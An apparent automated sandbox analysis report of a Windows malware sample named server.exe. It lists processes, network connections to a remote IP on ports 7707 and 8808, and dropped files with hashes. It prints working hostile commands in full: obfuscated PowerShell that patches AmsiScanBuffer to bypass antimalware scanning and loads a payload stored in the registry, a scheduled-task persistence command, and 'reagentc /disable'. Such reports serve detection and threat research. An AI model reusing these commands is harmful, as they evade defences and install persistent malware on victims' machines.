$GvBPegEQYWq.CreateType();}$ABVNnMPVUFdQW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+'s'+'o'+''+[Char](102)+''+'t'+''+'.'+'W'+[Char](105)+''+[Char](110)+''+'3'+''+'2'+''+[Char](46)+'U'+[Char](110)+'sa'+'f'+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+'d'+''+[Char](115)+'');$hbdKdDMIeLlXzm=$ABVNnMPVUFdQW.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+'ess',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+''+','+''+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qxNVRloXRoJnhvUVyYk=rTyxuLWpLrFY @([String])([IntPtr]);$hPCwQKGBmnqnhYLJMSMEGl=rTyxuLWpLrFY @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JMtyJTlRyyF=$ABVNnMPVUFdQW.GetMethod('G'+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+'n'+'e'+'l'+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+'l'+'l')));$oFIErMbClVKRFT=$hbdKdDMIeLlXzm.Invoke($Null,@([Object]$JMtyJTlRyyF,[Object]('L'+'o'+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$guiTXGWZzZkMhSqOS=$hbdKdDMIeLlXzm.Invoke($Null,@([Object]$JMtyJTlRyyF,[Object](''+[Char](86)+'i'+'r'+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+'c'+'t'+'')));$pFaAvUf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oFIErMbClVKRFT,$qxNVRloXRoJnhvUVyYk).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$fCdJaloLsjsTNWfqH=$hbdKdDMIeLlXzm.Invoke($Null,@([Object]$pFaAvUf,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+'can'+[Char](66)+''+[Char](117)+''+[Char](102)+'fe'+[Char](114)+'')));$LQThsHwgBg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($guiTXGWZzZkMhSqOS,$hPCwQKGBmnqnhYLJMSMEGl).Invoke($fCdJaloLsjsTNWfqH,[uint32]8,4,[ref]$LQThsHwgBg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fCdJaloLsjsTNWfqH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($guiTXGWZzZkMhSqOS,$hPCwQKGBmnqnhYLJMSMEGl).Invoke($fCdJaloLsjsTNWfqH,[uint32]8,0x20,[ref]$LQThsHwgBg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+'E').GetValue(''+'$'+''+[Char](55)+''+'7'+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{6afbaf3b-4484-4b72-9cd3-ccba1f5e399f}
C:\Users\Admin\AppData\Roaming\server.exe
"C:\Users\Admin\AppData\Roaming\server.exe"
C:\Windows\SysWOW64\REG.exe
"REG" QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\SysWOW64\cmd.exe
"cmd" /c reagentc.exe /disable
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\ReAgentc.exe
reagentc.exe /disable
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "server" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\server.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\tmpFC61.tmp.bat""
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "server" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\server.exe"'
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe
"C:\Windows\system32\config\systemprofile\AppData\Roaming\server.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c reagentc.exe /disable
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}
C:\Windows\SysWOW64\ReAgentc.exe
reagentc.exe /disable
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "server" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\server.exe"' & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe
"C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\server.exe"
C:\Windows\SysWOW64\REG.exe
"REG" QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "server" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\server.exe"'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:MlqzyHiElQWL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HlLUVRrXyXxwEs,[Parameter(Position=1)][Type]$tlynJvlLbo)$SnkAJlxmakT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+'o'+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+'M'+'y'+[Char](68)+''+[Char](101)+'l'+'e'+'ga'+'t'+'e'+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'',''+'C'+'la'+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](83)+''+'e'+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+[Char](110)+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+'C'+''+[Char](108)+'as'+[Char](115)+'',[MulticastDelegate]);$SnkAJlxmakT.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+'S'+[Char](105)+''+'g'+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$HlLUVRrXyXxwEs).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');$SnkAJlxmakT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'B'+'y'+''+'S'+'ig'+[Char](44)+'N'+[Char](101)+''+[Char](119)+'Sl'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+'i'+''+[Char](114)+'t'+'u'+''+'a'+''+[Char](108)+'',$tlynJvlLbo,$HlLUVRrXyXxwEs).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'an'+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $SnkAJlxmakT.CreateType();}$wQNGLBwpAVNXT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+'d'+[Char](108)+'l')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+'i'+'n'+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+'n'+''+[Char](115)+'a'+'f'+''+[Char](101)+''+[Char](78)+'a'+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+'t'+''+[Char](104)+''+'o'+''+[Char](100)+'s');$zyekvfWEtKbIXF=$wQNGLBwpAVNXT.GetMethod('G'+'e'+''+'t'+''+'P'+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+'d'+''+'d'+'r'+'e'+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FKFZehJWxVguPEdPqsf=MlqzyHiElQWL @([String])([IntPtr]);$ruHGuPMnoWdwsmpvUdQwwc=MlqzyHiElQWL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$DxyLvcnhHFp=$wQNGLBwpAVNXT.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+'ne'+[Char](108)+''+'3'+''+[Char](50)+'.d'+'l'+'l')));$NdJjZCQSWTMjMf=$zyekvfWEtKbIXF.Invoke($Null,@([Object]$DxyLvcnhHFp,[Object]('L'+[Char](111)+''+[Char](97)+'d'+'L'+'i'+[Char](98)+''+'r'+'a'+'r'+''+[Char](121)+''+'A'+'')));$nnSHxPNFKNNeyESBV=$zyekvfWEtKbIXF.Invoke($Null,@([Object]$DxyLvcnhHFp,[Object](''+'V'+''+'i'+'rtu'+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$PnrXVVp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NdJjZCQSWTMjMf,$FKFZehJWxVguPEdPqsf).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$pdbEjGSgOVqHJUXAS=$zyekvfWEtKbIXF.Invoke($Null,@([Object]$PnrXVVp,[Object]('A'+[Char](109)+''+'s'+'i'+[Char](83)+''+'c'+''+[Char](97)+'nB'+'u'+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$eqSyMBBJLW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nnSHxPNFKNNeyESBV,$ruHGuPMnoWdwsmpvUdQwwc).Invoke($pdbEjGSgOVqHJUXAS,[uint32]8,4,[ref]$eqSyMBBJLW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$pdbEjGSgOVqHJUXAS,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nnSHxPNFKNNeyESBV,$ruHGuPMnoWdwsmpvUdQwwc).Invoke($pdbEjGSgOVqHJUXAS,[uint32]8,0x20,[ref]$eqSyMBBJLW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+'7'+''+'s'+'t'+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{6005f29e-e544-43b0-8cc1-ce61f6fe6629}
C:\Users\Admin\AppData\Roaming\server.exe
"C:\Users\Admin\AppData\Roaming\server.exe"
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe b79514e16fe3047c57398db5e378dfa7 rdTHSDBjr0qVj/XVtoWHUg.0.1.0.0.0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 127.0.0.1:6606 | tcp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 127.0.0.1:7707 | tcp | |
| NL | 194.55.186.122:7707 | tcp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 127.0.0.1:6606 | tcp | |
| NL | 194.55.186.122:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| NL | 194.55.186.122:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| NL | 194.55.186.122:8808 | tcp | |
| NL | 194.55.186.122:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| NL | 194.55.186.122:7707 | tcp | |
| NL | 194.55.186.122:7707 | tcp |
Files
memory/764-0-0x00007FF96DF73000-0x00007FF96DF75000-memory.dmp
memory/764-1-0x00000000007E0000-0x0000000000854000-memory.dmp
memory/764-2-0x0000000001130000-0x000000000117E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\server.exe
| MD5 | 888ff5f8b060ce5be6249e2529a6a9ec |
| SHA1 | f2a2facd8e9f5d000102a90cd487a99c3acf5c42 |
| SHA256 | 5fc41380ed9f0400d4ffd34d0ef12099d88210904fe2f539acc7c16391da8f66 |
| SHA512 | 8590feb0ecbae8d408addc37a177eabcfb338e193cf34b81310a1b67f56be0de4850c5269e26bdc8670a109aa21c3560cad0571c9a4867871a88f53978e5b598 |
memory/2472-64-0x0000000074B8E000-0x0000000074B8F000-memory.dmp
memory/2472-65-0x0000000000FC0000-0x000000000100C000-memory.dmp
memory/2472-66-0x0000000005940000-0x00000000059A6000-memory.dmp
memory/2472-67-0x0000000005E10000-0x0000000005EAC000-memory.dmp
memory/2472-68-0x0000000074B80000-0x0000000075330000-memory.dmp
memory/2472-73-0x0000000005DE0000-0x0000000005DF2000-memory.dmp
memory/2472-74-0x0000000006E30000-0x00000000073D4000-memory.dmp
memory/2472-79-0x0000000074B80000-0x0000000075330000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp9819.tmp.bat
| MD5 | f6726e87c8c22df2839770999a832d7e |
| SHA1 | 5943005dfc609b2651bf81bf0f7f31a110f64e74 |
| SHA256 | 246614c2528aeaa22120bd15939d660da0ca6539fe7d3771132985e21c893cf8 |
| SHA512 | 7bcf1a46e3c9294fe53c5277ef6600bed787b6914db45b6375dbd98f2d055caf65186f4237d1dd01c38fa79214ee8e8fafccfd653e3b15654334bcbf895eb505 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\server.exe.log
| MD5 | 294367dd291cf52c49e0aea7db745ab7 |
| SHA1 | 77f54d0d35dad4fde4a37791f0ad4b087ee453ef |
| SHA256 | 245d0397c53126c9af23db4a3cf4e08ecbee60ecc2fdbba69b12cc7d606b7b8e |
| SHA512 | c685bc0efe880d221cd91fce12cc51aefba31c174786ab3caf6c00d4e763ba1dc45fd4f757793e367edf44cf5d64477ce88beec74ba48c48a3e408ad7376cf3b |
C:\Windows\Logs\ReAgent\ReAgent.log
| MD5 | 266ea1ffc8670bc3e9c92ccefa373ad6 |
| SHA1 | 623d5dc356ff804915881a8d42eff55dc1eff3a4 |
| SHA256 | 351766394c116eca9b8884947c1676b5918198acb2274d9a37f3c77719bd9011 |
| SHA512 | f105baf9e89826b4d05aa8df6983818ff59bbb18466a77472b47603f0dcb9251216b45636a82a55634262d50fc5de1953b41c28d84662ff3dabe02e68c42c92b |
C:\Windows\SysWOW64\Recovery\ReAgent.xml
| MD5 | 7ba1a1ae453e18669377cbd6eb101109 |
| SHA1 | e57bd758fffefce630ab1399876f5c50e67c7804 |
| SHA256 | 0f7d35d68a237b9c7d6d24c736e9a758761bb0840c113686b81e2ce33928ef65 |
| SHA512 | 7060bf7aeeaeaf1fb85f427307463ca00f3050318f8630e08a92d7be9f0a4870d8c44c3323c9b81df6f1651ad8171009c0abde3b11f766da238c785f72ba05ff |
C:\Windows\Panther\UnattendGC\diagwrn.xml
| MD5 | 25f5c74b9830bb0ea88b6ab50a4405aa |
| SHA1 | 746653818c6f3a0e639bb48a5aa3354ea36b1da8 |
| SHA256 | 40dd1b8f476482250183cebb743267291d451b382c14399982db893cabb61902 |
| SHA512 | 8fe9f2767cdc886e3bb40d07cef8eb4ebd661cda454640878f7885990fa0d71de3ca242aa84a9e2e50ea386dc86dfdbced8764f66f775151d0501a60f8848c26 |
C:\Windows\Panther\UnattendGC\diagerr.xml
| MD5 | 8344f40836cda9a798f11905f5e6c4ff |
| SHA1 | fdc4d205d8cbe99a59b47a7d14cf28eddcd393b7 |
| SHA256 | d5a66c8848bfeecf05fb4ed643ea0888225190b87b79266fbd3a4a3dafb19cea |
| SHA512 | 1ff61300a2dd8208f78720ab35f9f2934cc40c3b2c3f0024debe53e7e956a73c62946601f66093f7af91be63d9581b77d52d496b88a07cac4ebbb98f6f43a32d |
memory/868-93-0x0000000005E20000-0x0000000005E49000-memory.dmp
memory/2220-94-0x0000000000400000-0x000000000042B000-memory.dmp
memory/2220-97-0x0000000000400000-0x000000000042B000-memory.dmp
memory/3992-99-0x000002366D650000-0x000002366D672000-memory.dmp
C:\Windows\Temp\__PSScriptPolicyTest_ojryzihi.dz3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3992-108-0x0000023670040000-0x000002367006A000-memory.dmp
memory/3992-110-0x00007FF98B450000-0x00007FF98B50E000-memory.dmp
memory/3992-109-0x00007FF98C270000-0x00007FF98C465000-memory.dmp
memory/1924-114-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1924-118-0x00007FF98B450000-0x00007FF98B50E000-memory.dmp
memory/1924-116-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1924-113-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1924-112-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1924-111-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1924-119-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1924-117-0x00007FF98C270000-0x00007FF98C465000-memory.dmp
memory/672-143-0x00007FF94C2F0000-0x00007FF94C300000-memory.dmp
memory/952-155-0x00007FF94C2F0000-0x00007FF94C300000-memory.dmp
memory/64-166-0x00007FF94C2F0000-0x00007FF94C300000-memory.dmp
memory/64-165-0x000001A5719A0000-0x000001A5719CB000-memory.dmp
memory/64-159-0x000001A5719A0000-0x000001A5719CB000-memory.dmp
memory/512-173-0x000002837CAF0000-0x000002837CB1B000-memory.dmp
memory/868-171-0x0000000005EF0000-0x0000000005F82000-memory.dmp
memory/952-154-0x000002CA3CB00000-0x000002CA3CB2B000-memory.dmp
memory/952-148-0x000002CA3CB00000-0x000002CA3CB2B000-memory.dmp
memory/672-142-0x000001A852000000-0x000001A85202B000-memory.dmp
memory/672-136-0x000001A852000000-0x000001A85202B000-memory.dmp
memory/616-132-0x00007FF94C2F0000-0x00007FF94C300000-memory.dmp
memory/616-131-0x000001C6701F0000-0x000001C67021B000-memory.dmp
memory/616-125-0x000001C6701F0000-0x000001C67021B000-memory.dmp
memory/616-124-0x000001C6701F0000-0x000001C67021B000-memory.dmp
memory/616-123-0x000001C6701C0000-0x000001C6701E5000-memory.dmp
memory/868-493-0x00000000061E0000-0x0000000006202000-memory.dmp
C:\Windows\system32\drivers\etc\hosts
| MD5 | 4c3d2f52ebbc385b6a59fda070b8e90c |
| SHA1 | ab073fcd4b3669b751b2d3bcdc780b0d23afc530 |
| SHA256 | 31eed57f34247ba01371716d80544208b1c32194bd0cd807482d615bcb0efacd |
| SHA512 | 18bdbe36b1f82daaf8ea830964d99f7fa06f76d4e7ba58c8c4f289c98e395db3cfdf3a41d5086276e2263da98d64cbc8214fd07e957aaa06d8add884692349f8 |
C:\Windows\Logs\ReAgent\ReAgent.log
| MD5 | 5ecbc850b5fa6473ff523a13973d358a |
| SHA1 | 5b0b85fb1ed11a3305c14d7d92eef650e8f22ca8 |
| SHA256 | b69048b84eaf46d31f9f255b61025031c0365d479c0b171fa3b43e149d065ce9 |
| SHA512 | 56703d5aaf8924711f02b51944448e088849a59f98bc3861e0b54419fdbb61e21b633d522a5d1f6a422c632f58f8e6411433bc50850fa8be69d65a0e8e0366ee |
C:\Windows\Panther\UnattendGC\diagerr.xml
| MD5 | b51715c98c2681b1db8672fdec572f8a |
| SHA1 | f59faed191b4753a5cfc75a389db0421131dc6db |
| SHA256 | 0f9dbe75d90fb68cb5a79c7d7b8ddcf96dde63f87351160f3491627b28b54347 |
| SHA512 | 80d8ee2ec011a5d4e18a5f866926147b40f6cf529ad2b99491f35697dd416aef05577c52630271b5745a352733c9b01ddc6dfb4424b0c0b4f523c7d1d0dd9a8c |
C:\Windows\Panther\UnattendGC\setuperr.log
| MD5 | ced1ca365726eae2eb5ac2b0e64673f2 |
| SHA1 | ee405c8372585fa61e29287824c455b613ac4ccd |
| SHA256 | 972782c06405959ac6c88ccfb5fedd47344f29771f8cabb868549d3307e5c9fa |
| SHA512 | b12fa66715181031db278e44726278e05fd4c56b5eb8d21295f8a1e4b3da6e3fbf1d5006be3967f195118e43c6f691dbf8eb551354b5b9acd5606b2439178e5f |
C:\Windows\Panther\UnattendGC\diagwrn.xml
| MD5 | 3306412a599a75950385f5c9d0a31073 |
| SHA1 | 32d6ee13c5cddec57f5cad2df077d836fec2051d |
| SHA256 | 74807a52dcf3f68efebcd0d5c7b56bbd8a756af693bbf3fba146d10b0c7901d9 |
| SHA512 | 1709d9d287303c816d515720b579d12419341c20098f49bb1788acd54d1d9301b927487afe123209b47b1d5058ffaf0cad050ea689b15c86822fae43eda8238f |
C:\Windows\TEMP\tmpFC61.tmp.bat
| MD5 | c9a05695479ccfbcd7a10d1048c046fa |
| SHA1 | a5d42616f6834c37499e11a265693f05922ed5e4 |
| SHA256 | eb84a275f490cf0b921de3f0246bfe9dc815306f78cd5f9badccfb6211177eb9 |
| SHA512 | 60e6625d63eb658767a923545decf7a2940163242fa73415c3aaf16bd7f6ab6492ec45957f18ee7026c60f1331cea67d4421055b769848474ab422fe3fca91dd |
C:\Windows\Logs\ReAgent\ReAgent.log
| MD5 | 43f9997115d7b372562c298182c8833b |
| SHA1 | b20767a81183fc60e9d52d3cf35b0abac8ba273d |
| SHA256 | 9ce0e6cd1f842eb0ebd0b12c4e6a6e2d1a6d43cd5a99c59e2ecf11873d8568b0 |
| SHA512 | 72dd52a48b96c2ff4e21466316146a5f5ef3b73c1711e9f0a30abbeaae976a4b9ecc01a703eee0dd030a039438f07bb1218e04d06ac3634822502de47102c472 |
C:\Windows\Panther\UnattendGC\diagwrn.xml
| MD5 | 5f987e19ed33f457d5ee0c0835d9061f |
| SHA1 | 72b59285725842b5c9ac10a00d9d704c523704c9 |
| SHA256 | f59832cc4e69f6a68f7f1c954efb8ccd27d925d87c505c3f0cfb125e1b68054c |
| SHA512 | f27184ab689fd7e1fa03929ad3a3dadf42fab0940ff100ea979244ba970a5a5efb0614e855c22ed6cbec8c5669514816558a85d1c1eb9d771a4f266f7ea21e67 |
C:\Windows\Panther\UnattendGC\diagerr.xml
| MD5 | dfddf05354ab8c10c2e886ae2ada45d4 |
| SHA1 | af0834010af7a4bcb971c095d932c7a91eb832a7 |
| SHA256 | df5970399b7180ee2fd6b3a5d66a88769d9f406296cee757dd298cb9efdfca5d |
| SHA512 | f980232b84b307fa8a35d43b8a3212cacbbe94545d9cdf45567d28205578fd387e08c3231faaecb62170879b05049559e35cd8d0e037ee133d07a85df7fc1b80 |
C:\Windows\Panther\UnattendGC\setuperr.log
| MD5 | fa3090ad564214fafcade78a25cc74be |
| SHA1 | 32992fbeaf109d47635587c421a8886b25d56619 |
| SHA256 | 07030a6323223b7a89157b3958dae612ffe80c0859a1a7c33a2815f93dc8d326 |
| SHA512 | 504e7c9f9dd1581b86a5167edf9ed7e9a3e943399bfcfab7f3b4d9e6447902fc099719a63720aec7276fc587da22cf330eea5943772bb1cf2946d27da78e20c5 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | aa187cac09f051e24146ad549a0f08a6 |
| SHA1 | 2ef7fae3652bb838766627fa6584a6e3b5e74ff3 |
| SHA256 | 7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f |
| SHA512 | 960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2 |